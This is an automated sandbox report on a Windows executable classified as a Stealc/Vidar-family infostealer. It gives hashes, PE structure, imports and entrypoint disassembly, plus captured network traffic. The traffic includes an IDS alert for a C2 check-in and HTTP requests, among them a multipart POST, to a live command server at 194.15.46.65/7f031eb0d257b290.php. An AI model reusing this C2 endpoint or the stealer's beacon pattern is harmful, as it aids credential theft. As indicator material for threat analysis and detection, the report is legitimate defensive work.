                                            Start date and time:2024-10-27 13:06:08 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 4m 34s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:8
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:nGmqbXROga.exe
                                            renamed because original name is a hash value
                                            Original Sample Name:0f103ba48d169f87b6d066ca88bc03c1.exe
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@2/5@0/1
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 23
                                            • Number of non-executed functions: 165
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                            • Excluded IPs from analysis (whitelisted): 13.89.179.12
                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • VT rate limit hit for: nGmqbXROga.exe
                                            TimeTypeDescription
                                            08:07:20API Interceptor1x Sleep call for process: WerFault.exe modified
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            194.15.46.65t4GNf3V8mp.exeGet hashmaliciousStealc, VidarBrowse
                                            • 194.15.46.65/7f031eb0d257b290.php
                                            No context
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            VENUS-INTERNET-ASGBt4GNf3V8mp.exeGet hashmaliciousStealc, VidarBrowse
                                            • 194.15.46.65
                                            357oRnNepg.elfGet hashmaliciousUnknownBrowse
                                            • 217.138.142.250
                                            2jtSIERpll.elfGet hashmaliciousMiraiBrowse
                                            • 217.138.190.197
                                            luO0gwRNZ1.elfGet hashmaliciousMiraiBrowse
                                            • 217.138.190.173
                                            bPFO1DcK1x.elfGet hashmaliciousUnknownBrowse
                                            • 217.138.169.91
                                            KWnm2cUchM.elfGet hashmaliciousMiraiBrowse
                                            • 217.138.190.184
                                            KW2hzjzL6R.elfGet hashmaliciousMiraiBrowse
                                            • 217.138.170.96
                                            c0jodJn6tB.elfGet hashmaliciousMiraiBrowse
                                            • 217.138.109.7
                                            rcEe63XVnV.elfGet hashmaliciousUnknownBrowse
                                            • 217.138.142.227
                                            VlBtqs8BxH.elfGet hashmaliciousUnknownBrowse
                                            • 217.138.190.168
                                            No context
                                            No context
                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):65536
                                            Entropy (8bit):0.9631627159017979
                                            Encrypted:false
                                            SSDEEP:384:MFAFY9K/Iz7bF9bMd9A4jjTzuiFwY4IO88XU:709odvj3zuiFwY4IO8
                                            MD5:CC43B5EB49CA8AD19AEF265AA6F7B61B
                                            SHA1:CB6377AEDAF7BF5585CB56F1883BAEFBA02FE601
                                            SHA-256:0E3B10CA2759D5AE63392602CC117E94659EFE86A898AA8A3E6D0930DB702061
                                            SHA-512:C5EB09CE3944EC5C6F4DD8963A046FEE989C91C2E163B1F71E228D5C82A2F0F0A0AEBD4A0834775FC1C210D8958DBF10D91A666119010BDB580ACFD2BBD90283
                                            Malicious:true
                                            Reputation:low
                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.5.0.4.4.2.4.9.2.6.4.3.9.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.5.0.4.4.2.5.3.0.1.4.2.9.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.b.e.0.f.3.7.1.-.9.d.7.1.-.4.5.6.7.-.9.7.3.d.-.8.6.a.4.3.5.8.1.d.9.e.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.b.c.b.b.2.3.b.-.8.0.b.4.-.4.0.9.8.-.9.5.e.d.-.5.6.9.e.6.e.f.6.4.a.9.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.n.G.m.q.b.X.R.O.g.a...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.9.0.-.0.0.0.1.-.0.0.1.4.-.1.9.7.a.-.7.7.b.9.6.8.2.8.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.4.0.3.c.e.6.6.2.9.5.3.5.6.e.b.c.a.3.0.d.a.8.e.2.1.f.c.6.c.3.0.0.0.0.f.f.f.f.!.0.0.0.0.c.0.a.1.7.5.1.4.2.d.2.b.0.7.9.3.c.6.5.3.b.e.2.3.b.8.3.a.4.d.f.2.a.0.c.9.f.c.1.c.!.n.G.m.q.b.X.R.O.g.a...e.x.e.....T.a.r.g.e.t.A.p.p.
                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                            File Type:Mini DuMP crash report, 14 streams, Sun Oct 27 12:07:05 2024, 0x1205a4 type
                                            Category:dropped
                                            Size (bytes):60808
                                            Entropy (8bit):1.8989461402230836
                                            Encrypted:false
                                            SSDEEP:384:AV71S3TqXEEfW5hHbhjeeGpkVQOtzEZ6W9:21SD4EEoVhaeQyQ6y
                                            MD5:5D3819F30C89591E24B63197589315F9
                                            SHA1:622786EFA7D6379BBE4E45021D509A917BA088B6
                                            SHA-256:1F1F4D411B3A45A3E2373923DFD0981C8EEA93C26C782AB5E19FED92D0A98D55
                                            SHA-512:E5314C4104B0DEBB178B3BEDFD46CA451F855009BF3C20D2DA4ECEBE09E288652C43B2C8706C0311CBE5468BB5AEE872BEF905F4A1843F3A637FF3DC8BC7952D
                                            Malicious:false
                                            Reputation:low
                                            Preview:MDMP..a..... ........,.g............4...............<............*..........T.......8...........T............3.........................................................................................................eJ......H.......GenuineIntel............T............,.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):8340
                                            Entropy (8bit):3.697882366065391
                                            Encrypted:false
                                            SSDEEP:192:R6l7wVeJy3J6HRU6Y9CSUa7gmf2NBBC1sxWpDB89bG0Jsf8lQim:R6lXJyZ6HRU6YoSUa7gmf2NBBC16G0iF
                                            MD5:12A0DD8F95B3C14382955557F7231FE8
                                            SHA1:5CE7B2472EE9D1B52E870EEBFD8A301B69B2BFFC
                                            SHA-256:588CEA344FE41E759AAEC553DF5EA8AE624D1CDF032D1D32CFCB7101B55284C1
                                            SHA-512:B050B828A36EFF68B3C35FBD77893F2EEA7FC0ADA2CE3B021D11653362F7F5EDA10240DC28C4A708031944A2BF536EC35B901BB91E32850CC308CFE9AFC64B4E
                                            Malicious:false
                                            Reputation:low
                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.1.2.<./.P.i.
                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):4579
                                            Entropy (8bit):4.46390824483936
                                            Encrypted:false
                                            SSDEEP:48:cvIwWl8zs6Jg77aI98FYmWpW8VYRYm8M4JOuFi+q8us7fHQmC7ed:uIjfII7WFYn7VFJKc7fFC7ed
                                            MD5:00838ACAEB2A4254221A5882743E7E79
                                            SHA1:6A81424EEA255C5D7AD8CCCC0BA8F89762C430AA
                                            SHA-256:27E821373BD2966B4195CD62359271BC5FDDAE36C007820E4BCF3A5A124E520B
                                            SHA-512:4B0C82408BE7BFCCEE43E7680EF55C46169C9AA571ECB1B25658E6E3FAB6230CC39AD33279E28FDD3C717841D614FDEB44CD1E303D3429674C3987F6C3FDE8BD
                                            Malicious:false
                                            Reputation:low
                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="561789" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                            File Type:MS Windows registry file, NT/2000 or above
                                            Category:dropped
                                            Size (bytes):1835008
                                            Entropy (8bit):4.465462767483967
                                            Encrypted:false
                                            SSDEEP:6144:pIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNvdwBCswSbW:aXD94+WlLZMM6YFH1+W
                                            MD5:B426A3AAAF9809D3D965F944A69F3E32
                                            SHA1:EF05A24E6749D3B219E2BDDB1C5DFF1C882DBB81
                                            SHA-256:19FAAD5C282D33EE04031096613882462B7D8AAC5682CEA311DD16AF2DACD156
                                            SHA-512:EEDF44C71EAAA83D889FD12FE260DA3BFA27140B30186C230D12D74930F76AE7CCB70224D9A1EC8B5B851A828B0410DE8C2A6572B67579973F7A11CA40233150
                                            Malicious:false
                                            Reputation:low
                                            Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...h(..............................................................................................................................................................................................................................................................................................................................................T..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):6.647170851614513
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:nGmqbXROga.exe
                                            File size:406'016 bytes
                                            MD5:0f103ba48d169f87b6d066ca88bc03c1
                                            SHA1:c0a175142d2b0793c653be23b83a4df2a0c9fc1c
                                            SHA256:925c5c0d232f0b735e1eb0823890fe8b40c01d93f976a58ec605f36997c25079
                                            SHA512:73a093d14abac8423061e48d07937ffbc8f20d55ca4907573cc015c3b0beaaa7d03f4c2382ab22d1ab5136cc2464dbe5150608054a3eb449cbbd50b278f26884
                                            SSDEEP:6144:PUvJccZEtlVqligrLlAGyI3q0hdicY+X0fV/OAOv:QTEKI6lABI3q07ijf8A
                                            TLSH:2A847C5133F1EC15EBB68B337E7BC6F42A2BBC625E3A526DA1043D1F19321A18552723
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K......X...X...X..pX...X..bX...X..sX...X..eXd..X(..X...X...Xq..X..lX...X..rX...X..wX...XRich...X........................PE..L..
                                            Icon Hash:351a151410911209
                                            Entrypoint:0x4016f0
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x6630761A [Tue Apr 30 04:39:54 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:5
                                            OS Version Minor:0
                                            File Version Major:5
                                            File Version Minor:0
                                            Subsystem Version Major:5
                                            Subsystem Version Minor:0
                                            Import Hash:e5c7f5241db44a40977f45411126b318
                                            Instruction
                                            call 00007FFA8C7DC642h
                                            jmp 00007FFA8C7D8FDDh
                                            mov edi, edi
                                            push ebp
                                            mov ebp, esp
                                            sub esp, 00000328h
                                            mov dword ptr [00440778h], eax
                                            mov dword ptr [00440774h], ecx
                                            mov dword ptr [00440770h], edx
                                            mov dword ptr [0044076Ch], ebx
                                            mov dword ptr [00440768h], esi
                                            mov dword ptr [00440764h], edi
                                            mov word ptr [00440790h], ss
                                            mov word ptr [00440784h], cs
                                            mov word ptr [00440760h], ds
                                            mov word ptr [0044075Ch], es
                                            mov word ptr [00440758h], fs
                                            mov word ptr [00440754h], gs
                                            pushfd
                                            pop dword ptr [00440788h]
                                            mov eax, dword ptr [ebp+00h]
                                            mov dword ptr [0044077Ch], eax
                                            mov eax, dword ptr [ebp+04h]
                                            mov dword ptr [00440780h], eax
                                            lea eax, dword ptr [ebp+08h]
                                            mov dword ptr [0044078Ch], eax
                                            mov eax, dword ptr [ebp-00000320h]
                                            mov dword ptr [004406C8h], 00010001h
                                            mov eax, dword ptr [00440780h]
                                            mov dword ptr [0044067Ch], eax
                                            mov dword ptr [00440670h], C0000409h
                                            mov dword ptr [00440674h], 00000001h
                                            mov eax, dword ptr [0043F004h]
                                            mov dword ptr [ebp-00000328h], eax
                                            mov eax, dword ptr [0043F008h]
                                            mov dword ptr [ebp-00000324h], eax
                                            call dword ptr [000000F4h]
                                            Programming Language:
                                            • [C++] VS2008 build 21022
                                            • [ASM] VS2008 build 21022
                                            • [ C ] VS2008 build 21022
                                            • [IMP] VS2005 build 50727
                                            • [RES] VS2008 build 21022
                                            • [LNK] VS2008 build 21022
                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x3d93c0x3c.rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x27450000x21710.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x3c0000x1bc.rdata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000x3a57c0x3a600537fd2e82a84eba4b579c32b6b9347bfFalse0.8234408458244111data7.491298542432688IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rdata0x3c0000x23580x2400e6d1d7929e8f049818a55db996142764False0.3708767361111111data5.565267107982206IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data0x3f0000x27053780x4c0017442ce26cdea70d6090f52120892491unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .rsrc0x27450000x217100x21800dd863e1e4e754b0dec99f08d2f0d533bFalse0.4142665578358209data4.997391066572461IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            MACEJUMANISESIHEPUTUZALUPASAJ0x275d6780xbf7ASCII text, with very long lines (3063), with no line terminatorsTurkishTurkey0.6030035912504081
                                            RT_CURSOR0x275e2700x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7368421052631579
                                            RT_CURSOR0x275e3a00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.06130705394190871
                                            RT_ICON0x2745b500xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.5583688699360341
                                            RT_ICON0x27469f80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.6272563176895307
                                            RT_ICON0x27472a00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.668778801843318
                                            RT_ICON0x27479680x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.7398843930635838
                                            RT_ICON0x2747ed00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkishTurkey0.499896265560166
                                            RT_ICON0x274a4780x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkishTurkey0.5949812382739212
                                            RT_ICON0x274b5200x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkishTurkey0.5897540983606557
                                            RT_ICON0x274bea80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkishTurkey0.7296099290780141
                                            RT_ICON0x274c3880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.3334221748400853
                                            RT_ICON0x274d2300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.3935018050541516
                                            RT_ICON0x274dad80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.3980414746543779
                                            RT_ICON0x274e1a00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.4067919075144509
                                            RT_ICON0x274e7080x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TurkishTurkey0.22022821576763485
                                            RT_ICON0x2750cb00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TurkishTurkey0.25023452157598497
                                            RT_ICON0x2751d580x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TurkishTurkey0.28032786885245903
                                            RT_ICON0x27526e00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TurkishTurkey0.3076241134751773
                                            RT_ICON0x2752bc00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.38832622601279315
                                            RT_ICON0x2753a680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.546028880866426
                                            RT_ICON0x27543100x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.6111751152073732
                                            RT_ICON0x27549d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.6307803468208093
                                            RT_ICON0x2754f400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.40783302063789867
                                            RT_ICON0x2755fe80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.3975409836065574
                                            RT_ICON0x27569700x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.4379432624113475
                                            RT_ICON0x2756e400xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.3443496801705757
                                            RT_ICON0x2757ce80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.46525270758122744
                                            RT_ICON0x27585900x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.505184331797235
                                            RT_ICON0x2758c580x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.528179190751445
                                            RT_ICON0x27591c00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TurkishTurkey0.42645228215767633
                                            RT_ICON0x275b7680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.43151969981238275
                                            RT_ICON0x275c8100x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.4372950819672131
                                            RT_ICON0x275d1980x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.44592198581560283
                                            RT_STRING0x2760b200x12cdata0.5266666666666666
                                            RT_STRING0x2760c500x5aedata0.4401650618982118
                                            RT_STRING0x27612000x504data0.4462616822429907
                                            RT_STRING0x27617080x3f2data0.4603960396039604
                                            RT_STRING0x2761b000x706data0.42491657397107896
                                            RT_STRING0x27622080x792data0.4231166150670795
                                            RT_STRING0x27629a00x568data0.444364161849711
                                            RT_STRING0x2762f080x84edata0.4172154280338664
                                            RT_STRING0x27637580x830data0.4131679389312977
                                            RT_STRING0x2763f880x896data0.41173794358507737
                                            RT_STRING0x27648200x624data0.4351145038167939
                                            RT_STRING0x2764e480x5e0data0.4401595744680851
                                            RT_STRING0x27654280x6e6data0.4292185730464326
                                            RT_STRING0x2765b100x67adata0.4312424607961399
                                            RT_STRING0x27661900x57edata0.4445234708392603
                                            RT_GROUP_CURSOR0x27609480x22data1.0588235294117647
                                            RT_GROUP_ICON0x275d6000x76dataTurkishTurkey0.6694915254237288
                                            RT_GROUP_ICON0x274c3100x76dataTurkishTurkey0.6610169491525424
                                            RT_GROUP_ICON0x2756dd80x68dataTurkishTurkey0.7211538461538461
                                            RT_GROUP_ICON0x2752b480x76dataTurkishTurkey0.6694915254237288
                                            RT_VERSION0x27609700x1b0data0.5833333333333334
                                            DLLImport
                                            KERNEL32.dllGetComputerNameA, GetNumaNodeProcessorMask, SetDefaultCommConfigA, GetNumaProcessorNode, GetLocaleInfoA, DebugActiveProcessStop, CallNamedPipeA, UpdateResourceA, DeleteVolumeMountPointA, InterlockedIncrement, MoveFileExW, GetEnvironmentStringsW, GlobalLock, GetTimeFormatA, SetCommBreak, FreeEnvironmentStringsA, GetModuleHandleW, FormatMessageA, FatalAppExitW, GetSystemWow64DirectoryW, GetVersionExW, GlobalFlags, HeapCreate, GetNamedPipeInfo, GetConsoleAliasW, SetConsoleCursorPosition, GetFileAttributesW, GetModuleFileNameW, GetConsoleFontSize, GetBinaryTypeW, GetStringTypeExA, GetStdHandle, SetLastError, GetProcAddress, VirtualAllocEx, BuildCommDCBW, LoadLibraryA, Process32FirstW, UnhandledExceptionFilter, InterlockedExchangeAdd, OpenWaitableTimerW, LocalAlloc, SetCalendarInfoW, MoveFileA, SetCommMask, FindAtomA, GetOEMCP, DebugBreakProcess, ReadConsoleOutputCharacterW, OpenFileMappingA, LocalFree, LocalFileTimeToFileTime, CreateFileA, CloseHandle, HeapAlloc, MultiByteToWideChar, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, SetUnhandledExceptionFilter, IsDebuggerPresent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapReAlloc, Sleep, ExitProcess, WriteFile, GetModuleFileNameA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, GetLastError, InterlockedDecrement, HeapSize, GetCPInfo, GetACP, IsValidCodePage, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, RtlUnwind, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, SetFilePointer, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, GetModuleHandleA
                                            WINHTTP.dllWinHttpOpenRequest
                                            Language of compilation systemCountry where language is spokenMap
                                            TurkishTurkey
                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                            2024-10-27T13:07:05.026460+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730194.15.46.6580TCP
                                            TimestampSource PortDest PortSource IPDest IP
                                            Oct 27, 2024 13:07:03.522588968 CET4973080192.168.2.4194.15.46.65
                                            Oct 27, 2024 13:07:03.528157949 CET8049730194.15.46.65192.168.2.4
                                            Oct 27, 2024 13:07:03.528245926 CET4973080192.168.2.4194.15.46.65
                                            Oct 27, 2024 13:07:03.528430939 CET4973080192.168.2.4194.15.46.65
                                            Oct 27, 2024 13:07:03.533770084 CET8049730194.15.46.65192.168.2.4
                                            Oct 27, 2024 13:07:04.361742973 CET8049730194.15.46.65192.168.2.4
                                            Oct 27, 2024 13:07:04.361824989 CET4973080192.168.2.4194.15.46.65
                                            Oct 27, 2024 13:07:04.776170015 CET4973080192.168.2.4194.15.46.65
                                            Oct 27, 2024 13:07:04.781672001 CET8049730194.15.46.65192.168.2.4
                                            Oct 27, 2024 13:07:05.026348114 CET8049730194.15.46.65192.168.2.4
                                            Oct 27, 2024 13:07:05.026459932 CET4973080192.168.2.4194.15.46.65
                                            Oct 27, 2024 13:07:10.147850037 CET8049730194.15.46.65192.168.2.4
                                            Oct 27, 2024 13:07:10.150648117 CET4973080192.168.2.4194.15.46.65
                                            Oct 27, 2024 13:07:22.372699976 CET4973080192.168.2.4194.15.46.65
                                            • 194.15.46.65
                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.449730194.15.46.65807312C:\Users\user\Desktop\nGmqbXROga.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 27, 2024 13:07:03.528430939 CET87OUTGET / HTTP/1.1
                                            Host: 194.15.46.65
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Oct 27, 2024 13:07:04.361742973 CET203INHTTP/1.1 200 OK
                                            Date: Sun, 27 Oct 2024 12:07:04 GMT
                                            Server: Apache/2.4.41 (Ubuntu)
                                            Content-Length: 0
                                            Keep-Alive: timeout=5, max=100
                                            Connection: Keep-Alive
                                            Content-Type: text/html; charset=UTF-8
                                            Oct 27, 2024 13:07:04.776170015 CET416OUTPOST /7f031eb0d257b290.php HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=----GIJECGDGCBKECAKFBGCA
                                            Host: 194.15.46.65
                                            Content-Length: 217
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
